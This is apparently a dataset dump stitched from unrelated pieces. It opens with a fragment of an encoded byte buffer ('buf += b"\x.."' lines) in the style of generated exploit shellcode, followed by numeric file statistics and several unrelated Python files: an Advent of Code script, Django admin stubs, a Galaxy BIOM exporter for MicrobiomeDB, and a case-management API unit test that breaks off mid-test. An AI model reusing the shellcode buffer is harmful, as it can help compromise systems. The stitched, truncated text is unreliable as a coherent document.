b"\x58\x54\x46\x24\xd0\x7c\xb0\x0c\x99\x04\x16\x24\xe5" buf += b"\x9b\xf8\x1d\xa9\x54\x46\x6d\x59\xd8\xac\x74\xd0\xb0" buf += b"\x0a\xe4\xa8\xd8\x42\x71\x2e\x72\x41\x92\x8c\xd5\x71" buf += b"\xd7\x31\x55\x47\x6d\x59\xc0\xb9\x87\x70\xd4\x2d\x6d" buf += b"\xa6\x4c\x92\x3f\x00\x04\x16\x20\x68\x50\xb5\x0c\x99" buf += b"\x1c\xb9\xad\x11\x10\x3a\x7c\xe3\xbe\x49\xb2\xb9\x66" buf += b"\x2d\x75\xd0\x93\x2c\x7d\x18\xc1\xb4\xb4\xbb\x1c\xcf" buf += b"\x94\x18\x23\x3a\xe6\x6e\x33\xb9\xb8\x11\xa8\x2a\x75" buf += b"\xd0\xad\x07\xd7\xee\x70\xc0\xc2\xa6\x81\x0b\x5c\x99" buf += b"\xd1\xc9\xef\x11\xdd\xbf\x2c\xe3\xed\x14\x06\xb8\xab" buf += b"\x93\x25\xd0\x60\xb0\xb4\x9e\x15\xfc\x18\x37\xd4\x99" buf += b"\xc2\x8c\x1c\xc7\xa9\xe9\x9b\xf8\x3d\x11\xd7\xaa\x7d" buf += b"\x11\x10\x1a\x70\x68\x9d\x2c\x69\x18\xc1\xb0\xb4\xa0" buf += b"\x15\xfc\x6f\x80\x51\xa7\xc2\x8c\x1c\xc5\xa9\x79\xc7" buf += b"\x71\xcb\xd8\xa2\x74\xd6\x41\x2f\xb4\xb0\xc7\x54\x47" buf += b"\x6d\x59\xf3\xb8\x7c\x00\x3c\x46\x7d\x59\x99\xb9\x65" buf += b"\x11\xdd\xb4\x25\x68\x50\xb9\x87\x01\xf0\x15\x88\xa6" buf += b"\x4c\xb0\xb0\xc1\x54\x47\x6d\x59\xd0\x71\xe2\x0a\x02" buf += b"\x16\x20\x68\x50\xb1\xb4\xa9\x1c\xcf\xb7\x11\x10\x01" buf += b"\x7c\xe3\x56\x9f\xa5\x06\x66\x2d\x75\xda\x90\x66\x25" buf += b"\x58\x5a\xb0\x14\x9f\x21\xa6\x24\xd0\x67\xa7\x64\x18" buf += b"\x0d\x07\x3b\xb1\x89\xf8\x3d\x59\x79\x16\xf6\x59\xa1" buf += b"\xb0\xe2\xd3\xf9\xc5\xba\x57\x09\x5d\xf3\xde\x0a\x0e" buf += b"\x5c\x99\xd0\x71\xc5\xf3\xaa\x86\x18\xa2\xd1\xc9\xe6" buf += b"\x18\x56\x5a\x6d\x11\x10\x3a\xbd\xbb\x5b\x44\x71\x4f" buf += b"\xd8\x72\x29\x59\x15\xc0\x79\x41\xd8\x70\x29\x59\xaa" buf += b"\x86\x18\xba\xd1\xc9\xe6\xa7\x94\x07\x6f\x45\x99\xb9" buf += b"\xb7\x4d\x54\x07\xeb\x4d\x81\xb9\xb5\x4d\x54\x07\x6f" buf += b"\x4d\x81\xb9\xb7\x4d\x44\x07\x5d\x48\xd0\x07\xfc\x11" buf += b"\xab\x8f\x18\x82\xc6\xb9\xc2\xbe\x0c\x2c\x6d\x00\xd0" buf += b"\x3f\xff\xa9\xe1\xe4\x3b\xa6\x4c"
60.5
62
0.681053
777
3,267
2.863578
0.266409
0.095281
0.012135
0.010787
0
0
0
0
0
0
0
0.289025
0.048975
3,267
53
63
61.641509
0.4271
0
0
0
0
0.962264
0.821549
0.821549
0
1
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
1
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
8506de82d6055b04a2943e77fdb439071ce4d984
217
py
Python
2016/Day3/day3.py
dh256/adventofcode
428eec13f4cbf153333a0e359bcff23070ef6d27
[ "MIT" ]
null
null
null
2016/Day3/day3.py
dh256/adventofcode
428eec13f4cbf153333a0e359bcff23070ef6d27
[ "MIT" ]
null
null
null
2016/Day3/day3.py
dh256/adventofcode
428eec13f4cbf153333a0e359bcff23070ef6d27
[ "MIT" ]
null
null
null
from Triangles import Triangles

triangles = Triangles("input.txt")

print(f'Part 1 Possible Triangles = {triangles.possible(columns=False)}')
print(f'Part 2 Possible Triangles = {triangles.possible(columns=True)}')
27.125
73
0.769585
28
217
5.964286
0.5
0.431138
0.11976
0.407186
0.491018
0
0
0
0
0
0
0.010256
0.101382
217
7
74
31
0.846154
0
0
0
0
0
0.623256
0.32093
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0.5
1
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
6
85130f3e4ad5c5120ad2e6f0fda31687cde600e1
48
py
Python
tests/unit/__init__.py
Agi-dev/pylaas
7cb6a3e1d560843886b27d4fa5aaf9ff74a555f7
[ "MIT" ]
null
null
null
tests/unit/__init__.py
Agi-dev/pylaas
7cb6a3e1d560843886b27d4fa5aaf9ff74a555f7
[ "MIT" ]
null
null
null
tests/unit/__init__.py
Agi-dev/pylaas
7cb6a3e1d560843886b27d4fa5aaf9ff74a555f7
[ "MIT" ]
null
null
null
from pylaas.pylaas import Pylaas

Pylaas.init()
12
32
0.791667
7
48
5.428571
0.571429
0.631579
0
0
0
0
0
0
0
0
0
0
0.125
48
3
33
16
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
51e0a0bde3e606a8d923a4a2f6c574587c3699aa
94
py
Python
gdcdatamodel/validators/__init__.py
uc-cdis/gdcdatamodel
731c6fee160586dde4e5ff3bc76f131201c71543
[ "Apache-2.0" ]
27
2016-06-24T20:32:44.000Z
2022-01-17T07:53:48.000Z
gdcdatamodel/validators/__init__.py
NCI-GDC/gdcdatamodel
924fc8ab695b1cbb0131636ffcb6d3881db2e200
[ "Apache-2.0" ]
63
2016-07-20T21:40:11.000Z
2021-08-12T18:39:21.000Z
gdcdatamodel/validators/__init__.py
uc-cdis/gdcdatamodel
731c6fee160586dde4e5ff3bc76f131201c71543
[ "Apache-2.0" ]
5
2016-10-20T20:00:09.000Z
2020-08-14T08:55:40.000Z
from .json_validators import GDCJSONValidator
from .graph_validators import GDCGraphValidator
31.333333
47
0.893617
10
94
8.2
0.7
0.390244
0
0
0
0
0
0
0
0
0
0
0.085106
94
2
48
47
0.953488
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cfdf91ae1cb6e8022118a3f1b41c2937678fb7cc
160
py
Python
reports/admin.py
mikael19/activity
3932de42d9b423bff5739f7e06520035df213fc6
[ "Apache-2.0" ]
60
2020-02-13T17:20:43.000Z
2022-03-12T19:26:04.000Z
reports/admin.py
mikael19/activity
3932de42d9b423bff5739f7e06520035df213fc6
[ "Apache-2.0" ]
449
2020-02-12T22:18:00.000Z
2022-03-11T23:36:59.000Z
reports/admin.py
mikael19/activity
3932de42d9b423bff5739f7e06520035df213fc6
[ "Apache-2.0" ]
31
2020-03-07T21:00:54.000Z
2021-07-14T18:37:34.000Z
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from django.contrib import admin

from .models import Report, ReportAdmin

admin.site.register(Report, ReportAdmin)
17.777778
40
0.7375
21
160
5.619048
0.761905
0.288136
0
0
0
0
0
0
0
0
0
0.014286
0.125
160
8
41
20
0.828571
0.24375
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cfe98e2e60d9e9fba419167cf7355bbd889f6279
181
py
Python
students/k3342/laboratory_works/Evgenov_Sergei/laboratory_work_1/homework_project_evgenov/homework_app/admin.py
TonikX/ITMO_ICT_-WebProgramming_2020
ba566c1b3ab04585665c69860b713741906935a0
[ "MIT" ]
10
2020-03-20T09:06:12.000Z
2021-07-27T13:06:02.000Z
students/k3342/laboratory_works/Evgenov_Sergei/laboratory_work_1/homework_project_evgenov/homework_app/admin.py
TonikX/ITMO_ICT_-WebProgramming_2020
ba566c1b3ab04585665c69860b713741906935a0
[ "MIT" ]
134
2020-03-23T09:47:48.000Z
2022-03-12T01:05:19.000Z
students/k3342/laboratory_works/Evgenov_Sergei/laboratory_work_1/homework_project_evgenov/homework_app/admin.py
TonikX/ITMO_ICT_-WebProgramming_2020
ba566c1b3ab04585665c69860b713741906935a0
[ "MIT" ]
71
2020-03-20T12:45:56.000Z
2021-10-31T19:22:25.000Z
from django.contrib import admin

# Register your models here.
from .models import Homework
from .models import Comment

admin.site.register(Homework)
admin.site.register(Comment)
18.1
32
0.80663
25
181
5.84
0.48
0.136986
0.219178
0
0
0
0
0
0
0
0
0
0.121547
181
9
33
20.111111
0.918239
0.143646
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.6
0
0.6
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
3204af199cb003e852ca0760cb9defcf59d47794
151
py
Python
active_learning_ts/instance_properties/objectives/constant_instance_objective.py
hassberg/active_learning_ts
7ebdabd3349d3ac4ea2761a8aa869b8d222a2d83
[ "MIT" ]
1
2022-02-14T09:38:22.000Z
2022-02-14T09:38:22.000Z
active_learning_ts/instance_properties/objectives/constant_instance_objective.py
hassberg/active_learning_ts
7ebdabd3349d3ac4ea2761a8aa869b8d222a2d83
[ "MIT" ]
1
2022-02-11T12:13:31.000Z
2022-02-11T12:13:31.000Z
active_learning_ts/instance_properties/objectives/constant_instance_objective.py
hassberg/active_learning_ts
7ebdabd3349d3ac4ea2761a8aa869b8d222a2d83
[ "MIT" ]
2
2021-12-15T12:56:30.000Z
2022-02-01T15:31:08.000Z
from active_learning_ts.instance_properties.instance_objective import InstanceObjective


class ConstantInstanceObjective(InstanceObjective):
    pass
25.166667
87
0.880795
14
151
9.214286
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.086093
151
5
88
30.2
0.934783
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
5c89e099dbb6487518321274d452146bff4c881c
31
py
Python
d3rlpy/metrics/__init__.py
YangRui2015/d3rlpy
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
[ "MIT" ]
1
2021-05-08T06:21:05.000Z
2021-05-08T06:21:05.000Z
d3rlpy/metrics/__init__.py
YangRui2015/d3rlpy
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
[ "MIT" ]
null
null
null
d3rlpy/metrics/__init__.py
YangRui2015/d3rlpy
da778b2a2b0afbafe25395296baecd0d4d0cd0d5
[ "MIT" ]
null
null
null
from . import comparer, scorer
15.5
30
0.774194
4
31
6
1
0
0
0
0
0
0
0
0
0
0
0
0.16129
31
1
31
31
0.923077
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7a91c7a166a3924e77fb2de527555edf8c09057c
27
py
Python
utils/__init__.py
xdr940/monodepth2_Xavier
6d7d522237df8552644c1c10f97b309be5b53498
[ "MIT" ]
2
2020-10-26T08:14:03.000Z
2020-11-19T07:49:25.000Z
utils/__init__.py
maomingyang/monodepth2_Xavier
80bb9d34cacdfe7d1852a67405c2f8611f1f90e1
[ "MIT" ]
null
null
null
utils/__init__.py
maomingyang/monodepth2_Xavier
80bb9d34cacdfe7d1852a67405c2f8611f1f90e1
[ "MIT" ]
1
2020-10-26T08:14:06.000Z
2020-10-26T08:14:06.000Z
from .logger import Writer
13.5
26
0.814815
4
27
5.5
1
0
0
0
0
0
0
0
0
0
0
0
0.148148
27
1
27
27
0.956522
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8f8443c5e076bbde5f69f55086b6374ba65b00ae
18503
py
Python
Tools/lib/python/eupath/BiomFileMicrobiomeDbExporter.py
VEuPathDB/EuPathGalaxy
39768986ebe9555870d9435b523da768935fa4fe
[ "Apache-2.0" ]
null
null
null
Tools/lib/python/eupath/BiomFileMicrobiomeDbExporter.py
VEuPathDB/EuPathGalaxy
39768986ebe9555870d9435b523da768935fa4fe
[ "Apache-2.0" ]
null
null
null
Tools/lib/python/eupath/BiomFileMicrobiomeDbExporter.py
VEuPathDB/EuPathGalaxy
39768986ebe9555870d9435b523da768935fa4fe
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python from . import EupathExporter import biom from biom.cli.table_validator import _validate_table from biom.parse import load_table class BiomExport(EupathExporter.Export): BIOM_TYPE = "BIOM" BIOM_VERSION = "1.0, 2.0, or 2.1" def __init__(self, args): """ Initializes the gene list export class with the parameters needed to accomplish the particular type of export. :param args: parameters provided from tool form """ EupathExporter.Export.__init__(self, BiomExport.BIOM_TYPE, BiomExport.BIOM_VERSION, None, args) # generic 7 arguments and then dataset file path if len(args) < 8: raise EupathExporter.ValidationException("The tool was passed an insufficient numbers of arguments:", args) self._dataset_file_path = args[7] def validate_datasets(self): # try read a file # gives stupid errors like "Invalid format 'Biological Observation Matrix 0.9.1-dev', must be '1.0.0'" # valid, report = _validate_table(self._dataset_file_path) # if not valid: # raise EupathExporter.ValidationException(report) try: table=load_table(self._dataset_file_path) except ValueError, e: raise EupathExporter.ValidationException("Could not load the file as BIOM - does it conform to the specification on https://biom-format.org?", e) give_table_extra_methods(table) generated_by="MicrobiomeDb exporter" with open(self._dataset_file_path+".metadata.json", 'w') as f1: table.to_json_but_only_metadata(generated_by, direct_io=f1) with open(self._dataset_file_path+".data.tsv", 'w') as f2: table.to_json_but_only_data_and_not_json_but_tsv(generated_by, direct_io=f2) def identify_dependencies(self): return [] def identify_projects(self): return ["MicrobiomeDB"] def identify_supported_projects(self): return ["MicrobiomeDB"] def identify_dataset_files(self): return [ {"name": "uploaded.biom", "path": self._dataset_file_path}, {"name": "metadata.json", "path": self._dataset_file_path+".metadata.json"}, {"name": "data.tsv", "path": self._dataset_file_path + ".data.tsv"} ] def output_success(self): header = "<html><body><h1>Good news!</h1><br />" msg = """ <h2>Results of the VEuPathDB Export Tool<br />BIOM files to MicrobiomeDB</h2> <h3>Your BIOM file was exported from Galaxy to your account in VEuPathDB. For file access, go to the My Data Sets section on MicrobiomeDB: <a href='http://microbiomedb.org/mbio/app/workspace/datasets'>My Data Sets</a><br /> </h3><br /> </body></html> """ with open(self._output, 'w') as file: file.write("%s%s" % (header,msg)) def give_table_extra_methods(table): # just my looking at the name you know this is gonna be good isn't it # takes a table and attaches these two methods to it: # - to_json_but_only_metadata # - to_json_but_only_data_and_not_json_but_tsv # # Done by twice replicating the 200 lines long method from # https://github.com/biocore/biom-format/blob/fd84172794d14a741a5764234d7a28416b9dba08/biom/table.py#L4451 # and judiciously commenting stuff out # # View in python-coloring editor to see what got commented out or diff with the package code to find out how they were changed # Scroll to the bottom of the file to see how they get added # # # Here are the globals # from future.utils import string_types def get_biom_format_version_string(version=None): """Returns the current Biom file format version. 
Parameters ---------- version : tuple a tuple containing the version number of the biom table """ if version is None: return "Biological Observation Matrix 1.0.0" else: return "Biological Observation Matrix %s.%s.0" % (version[0], version[1]) def get_biom_format_url_string(): return "http://biom-format.org" from datetime import datetime from json import dumps def to_json_but_only_metadata(self, generated_by, direct_io=None): """Returns a JSON string representing the table in BIOM format. Parameters ---------- generated_by : str a string describing the software used to build the table direct_io : file or file-like object, optional Defaults to ``None``. Must implementing a ``write`` function. If `direct_io` is not ``None``, the final output is written directly to `direct_io` during processing. Returns ------- str A JSON-formatted string representing the biom table """ if not isinstance(generated_by, string_types): raise TableException("Must specify a generated_by string") # Fill in top-level metadata. if direct_io: direct_io.write(u'{') direct_io.write(u'"id": "%s",' % str(self.table_id)) direct_io.write( u'"format": "%s",' % get_biom_format_version_string((1, 0))) # JSON table -> 1.0.0 direct_io.write( u'"format_url": "%s",' % get_biom_format_url_string()) direct_io.write(u'"generated_by": "%s",' % generated_by) direct_io.write(u'"date": "%s",' % datetime.now().isoformat()) else: id_ = u'"id": "%s",' % str(self.table_id) format_ = u'"format": "%s",' % get_biom_format_version_string( (1, 0)) # JSON table -> 1.0.0 format_url = u'"format_url": "%s",' % get_biom_format_url_string() generated_by = u'"generated_by": "%s",' % generated_by date = u'"date": "%s",' % datetime.now().isoformat() # Determine if we have any data in the matrix, and what the shape of # the matrix is. try: num_rows, num_cols = self.shape except: # noqa num_rows = num_cols = 0 has_data = True if num_rows > 0 and num_cols > 0 else False # Default the matrix element type to test to be an integer in case we # don't have any data in the matrix to test. test_element = 0 if has_data: test_element = self[0, 0] # Determine the type of elements the matrix is storing. if isinstance(test_element, int): matrix_element_type = u"int" elif isinstance(test_element, float): matrix_element_type = u"float" elif isinstance(test_element, string_types): matrix_element_type = u"str" else: raise TableException("Unsupported matrix data type.") # Fill in details about the matrix. if direct_io: direct_io.write( u'"matrix_element_type": "%s",' % matrix_element_type) direct_io.write(u'"shape": [%d, %d],' % (num_rows, num_cols)) else: matrix_element_type = u'"matrix_element_type": "%s",' % \ matrix_element_type shape = u'"shape": [%d, %d],' % (num_rows, num_cols) # Fill in the table type if self.type is None: type_ = u'"type": null,' else: type_ = u'"type": "%s",' % self.type if direct_io: direct_io.write(type_) # Fill in details about the rows in the table and fill in the matrix's # data. 
BIOM 2.0+ is now only sparse if direct_io: direct_io.write(u'"matrix_type": "sparse",') """ direct_io.write(u'"data": [') """ else: matrix_type = u'"matrix_type": "sparse",' """ data = [u'"data": ['] """ data=[] max_row_idx = len(self.ids(axis='observation')) - 1 max_col_idx = len(self.ids()) - 1 rows = [u'"rows": ['] have_written = False for obs_index, obs in enumerate(self.iter(axis='observation')): # i'm crying on the inside if obs_index != max_row_idx: rows.append(u'{"id": %s, "metadata": %s},' % (dumps(obs[1]), dumps(obs[2]))) else: rows.append(u'{"id": %s, "metadata": %s}],' % (dumps(obs[1]), dumps(obs[2]))) # turns out its a pain to figure out when to place commas. the # simple work around, at the expense of a little memory # (bound by the number of samples) is to build of what will be # written, and then add in the commas where necessary. built_row = [] for col_index, val in enumerate(obs[0]): if float(val) != 0.0: built_row.append(u"[%d,%d,%r]" % (obs_index, col_index, val)) """ if built_row: # if we have written a row already, its safe to add a comma if have_written: if direct_io: direct_io.write(u',') else: data.append(u',') if direct_io: direct_io.write(u','.join(built_row)) else: data.append(u','.join(built_row)) have_written = True """ """ # finalize the data block if direct_io: direct_io.write(u"],") else: data.append(u"],") """ # Fill in details about the columns in the table. columns = [u'"columns": ['] for samp_index, samp in enumerate(self.iter()): if samp_index != max_col_idx: columns.append(u'{"id": %s, "metadata": %s},' % ( dumps(samp[1]), dumps(samp[2]))) else: columns.append(u'{"id": %s, "metadata": %s}]' % ( dumps(samp[1]), dumps(samp[2]))) if rows[0] == u'"rows": [' and len(rows) == 1: # empty table case rows = [u'"rows": [],'] columns = [u'"columns": []'] rows = u''.join(rows) columns = u''.join(columns) if direct_io: direct_io.write(rows) direct_io.write(columns) direct_io.write(u'}') else: return u"{%s}" % ''.join([id_, format_, format_url, matrix_type, generated_by, date, type_, matrix_element_type, shape, u''.join(data), rows, columns]) # This is also copy pasted from # https://github.com/biocore/biom-format/blob/fd84172794d14a741a5764234d7a28416b9dba08/biom/table.py#L4451 def to_json_but_only_data_and_not_json_but_tsv(self, generated_by, direct_io=None): """Returns a JSON string representing the table in BIOM format. Parameters ---------- generated_by : str a string describing the software used to build the table direct_io : file or file-like object, optional Defaults to ``None``. Must implementing a ``write`` function. If `direct_io` is not ``None``, the final output is written directly to `direct_io` during processing. Returns ------- str A JSON-formatted string representing the biom table """ """ if not isinstance(generated_by, string_types): raise TableException("Must specify a generated_by string") # Fill in top-level metadata. 
if direct_io: direct_io.write(u'{') direct_io.write(u'"id": "%s",' % str(self.table_id)) direct_io.write( u'"format": "%s",' % get_biom_format_version_string((1, 0))) # JSON table -> 1.0.0 direct_io.write( u'"format_url": "%s",' % get_biom_format_url_string()) direct_io.write(u'"generated_by": "%s",' % generated_by) direct_io.write(u'"date": "%s",' % datetime.now().isoformat()) else: id_ = u'"id": "%s",' % str(self.table_id) format_ = u'"format": "%s",' % get_biom_format_version_string( (1, 0)) # JSON table -> 1.0.0 format_url = u'"format_url": "%s",' % get_biom_format_url_string() generated_by = u'"generated_by": "%s",' % generated_by date = u'"date": "%s",' % datetime.now().isoformat() # Determine if we have any data in the matrix, and what the shape of # the matrix is. try: num_rows, num_cols = self.shape except: # noqa num_rows = num_cols = 0 has_data = True if num_rows > 0 and num_cols > 0 else False # Default the matrix element type to test to be an integer in case we # don't have any data in the matrix to test. test_element = 0 if has_data: test_element = self[0, 0] # Determine the type of elements the matrix is storing. if isinstance(test_element, int): matrix_element_type = u"int" elif isinstance(test_element, float): matrix_element_type = u"float" elif isinstance(test_element, string_types): matrix_element_type = u"str" else: raise TableException("Unsupported matrix data type.") # Fill in details about the matrix. if direct_io: direct_io.write( u'"matrix_element_type": "%s",' % matrix_element_type) direct_io.write(u'"shape": [%d, %d],' % (num_rows, num_cols)) else: matrix_element_type = u'"matrix_element_type": "%s",' % \ matrix_element_type shape = u'"shape": [%d, %d],' % (num_rows, num_cols) # Fill in the table type if self.type is None: type_ = u'"type": null,' else: type_ = u'"type": "%s",' % self.type if direct_io: direct_io.write(type_) # Fill in details about the rows in the table and fill in the matrix's # data. BIOM 2.0+ is now only sparse if direct_io: direct_io.write(u'"matrix_type": "sparse",') direct_io.write(u'"data": [') else: matrix_type = u'"matrix_type": "sparse",' data = [u'"data": ['] max_row_idx = len(self.ids(axis='observation')) - 1 max_col_idx = len(self.ids()) - 1 rows = [u'"rows": ['] have_written = False """ for obs_index, obs in enumerate(self.iter(axis='observation')): """ # i'm crying on the inside if obs_index != max_row_idx: rows.append(u'{"id": %s, "metadata": %s},' % (dumps(obs[1]), dumps(obs[2]))) else: rows.append(u'{"id": %s, "metadata": %s}],' % (dumps(obs[1]), dumps(obs[2]))) # turns out its a pain to figure out when to place commas. the # simple work around, at the expense of a little memory # (bound by the number of samples) is to build of what will be # written, and then add in the commas where necessary. built_row = [] """ for col_index, val in enumerate(obs[0]): if float(val) != 0.0: if direct_io: direct_io.write(u"%d\t%d\t%r\n" % (obs_index, col_index, val)) else: data.append([obs_index, col_index, val]) """ built_row.append(u"[%d,%d,%r]" % (obs_index, col_index, val)) if built_row: # if we have written a row already, its safe to add a comma if have_written: if direct_io: direct_io.write(u',') else: data.append(u',') if direct_io: direct_io.write(u','.join(built_row)) else: data.append(u','.join(built_row)) have_written = True """ """ # finalize the data block if direct_io: direct_io.write(u"],") else: data.append(u"],") # Fill in details about the columns in the table. 
columns = [u'"columns": ['] for samp_index, samp in enumerate(self.iter()): if samp_index != max_col_idx: columns.append(u'{"id": %s, "metadata": %s},' % ( dumps(samp[1]), dumps(samp[2]))) else: columns.append(u'{"id": %s, "metadata": %s}]' % ( dumps(samp[1]), dumps(samp[2]))) if rows[0] == u'"rows": [' and len(rows) == 1: # empty table case rows = [u'"rows": [],'] columns = [u'"columns": []'] rows = u''.join(rows) columns = u''.join(columns) if direct_io: direct_io.write(rows) direct_io.write(columns) direct_io.write(u'}') else: return u"{%s}" % ''.join([id_, format_, format_url, matrix_type, generated_by, date, type_, matrix_element_type, shape, u''.join(data), rows, columns]) """ # # # Here's the patching # Taken from https://stackoverflow.com/a/28060251 # # table.to_json_but_only_metadata = to_json_but_only_metadata.__get__(table) table.to_json_but_only_data_and_not_json_but_tsv = to_json_but_only_data_and_not_json_but_tsv.__get__(table)
39.620985
157
0.529806
2253
18503
4.166001
0.146028
0.052845
0.048476
0.043256
0.764223
0.737375
0.711485
0.708928
0.708928
0.703068
0
0.014602
0.355996
18503
466
158
39.706009
0.773078
0.103983
0
0.207101
0
0.011834
0.175399
0.005239
0
0
0
0
0
0
null
null
0.005917
0.04142
null
null
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
8fad947383ebed4a8dc5105f198868d325d01faf
26
py
Python
docs/test.py
sn696/nlp
2fecf255e138f770281e41c416d7943c88e984b0
[ "Apache-2.0" ]
null
null
null
docs/test.py
sn696/nlp
2fecf255e138f770281e41c416d7943c88e984b0
[ "Apache-2.0" ]
null
null
null
docs/test.py
sn696/nlp
2fecf255e138f770281e41c416d7943c88e984b0
[ "Apache-2.0" ]
null
null
null
def bla():
    print("HI")
13
15
0.5
4
26
3.25
1
0
0
0
0
0
0
0
0
0
0
0
0.230769
26
2
15
13
0.65
0
0
0
0
0
0.074074
0
0
0
0
0
0
1
0.5
true
0
0
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
1
0
6
8fb2489cd1dd2952b86b11284654e9047e428b6f
20760
py
Python
unit_tests/test_case.py
LandRegistry/digital-street-case-management-api
e1a44deede52c257dd0d2655e276242fbedb406d
[ "MIT" ]
null
null
null
unit_tests/test_case.py
LandRegistry/digital-street-case-management-api
e1a44deede52c257dd0d2655e276242fbedb406d
[ "MIT" ]
null
null
null
unit_tests/test_case.py
LandRegistry/digital-street-case-management-api
e1a44deede52c257dd0d2655e276242fbedb406d
[ "MIT" ]
3
2019-04-26T06:37:25.000Z
2021-04-11T05:22:28.000Z
from unittest import TestCase, mock from case_management_api.exceptions import ConflictError from case_management_api.main import app from case_management_api.extensions import db from case_management_api.models import Case, User, Address, X500Name import json import copy # Test data address = Address("1", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") seller_address = Address("11", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") seller = User(1, "Lisa", "Seller", "lisa.seller@example.com", "12345678901", seller_address) seller_conveyancer_address = Address("12", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") seller_conveyancer1 = User(2, "Natasha", "Conveyancer", "natasha.conveyancer@example.com", "10293847565", seller_conveyancer_address) seller_conveyancer2 = User(3, "Tash", "Conveyancer", "natasha2.conveyancer@example.com", "10293847567", seller_conveyancer_address) buyer_address = Address("13", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") buyer = User(4, "David", "Buyer", "david.buyer@example.com", "10987654321", buyer_address) buyer_conveyancer_address = Address("14", "Digital Street", "Bristol", "Bristol", "United Kingdom", "BS2 8EN") buyer_conveyancer = User(5, "Samuel", "Conveyancer", "samuel.conveyancer@example.com", "10293847566", buyer_conveyancer_address) case1 = Case("sell", "ABCD123", seller_conveyancer1, seller, buyer, X500Name("Conveyancer B", "Plymouth", "GB"), buyer_conveyancer, address) case2 = Case("sell", "ABCD123", seller_conveyancer2, seller, buyer, X500Name("Conveyancer B", "Plymouth", "GB"), buyer_conveyancer, address) case2.title_number = "ZQV888860" case3 = Case("sell", "DCBA321", seller_conveyancer1, seller, buyer, X500Name("Conveyancer B", "Plymouth", "GB"), buyer_conveyancer, address) case3.title_number = "ZQV888860" case3.status = "completed" standard_dict = { "case_reference": "ABCD123".upper(), "case_type": "buy", "assigned_staff_id": 3, "client_id": 1, "status": "active", "address": { "house_name_number": "1", "street": "Digital Street", "town_city": "Bristol", "county": "Bristol", "country": "England", "postcode": "BS2 8EN" }, "title_number": "ZQV888860", "counterparty_id": 2, "counterparty_conveyancer_org": { "organisation": "Generic Conveyancing Company", "locality": "Plymouth", "country": "GB", "state": "Devon" }, "counterparty_conveyancer_contact_id": 4 } # Tests the Case endpoints class TestCases(TestCase): def setUp(self): """Sets up the tests.""" self.app = app.test_client() @mock.patch.object(db.Model, 'query') def test_001_get_cases(self, mock_db_query): """Gets a list of all cases.""" mock_db_query.all.return_value = [case1, case2] response = self.app.get('/v1/cases', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_002_get_cases_for_assigned_staff(self, mock_db_query): """Gets a list of all cases with the assigned member of staff.""" mock_db_query.filter_by.return_value.all.return_value = [case1, case3] response = self.app.get('/v1/cases?assigned_staff_id=1', headers={'accept': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) self.assertEqual(len(response.json), 2) @mock.patch.object(db.Model, 'query') def test_003_get_cases_for_title_number(self, mock_db_query): """Gets a list of all cases with the title number.""" 
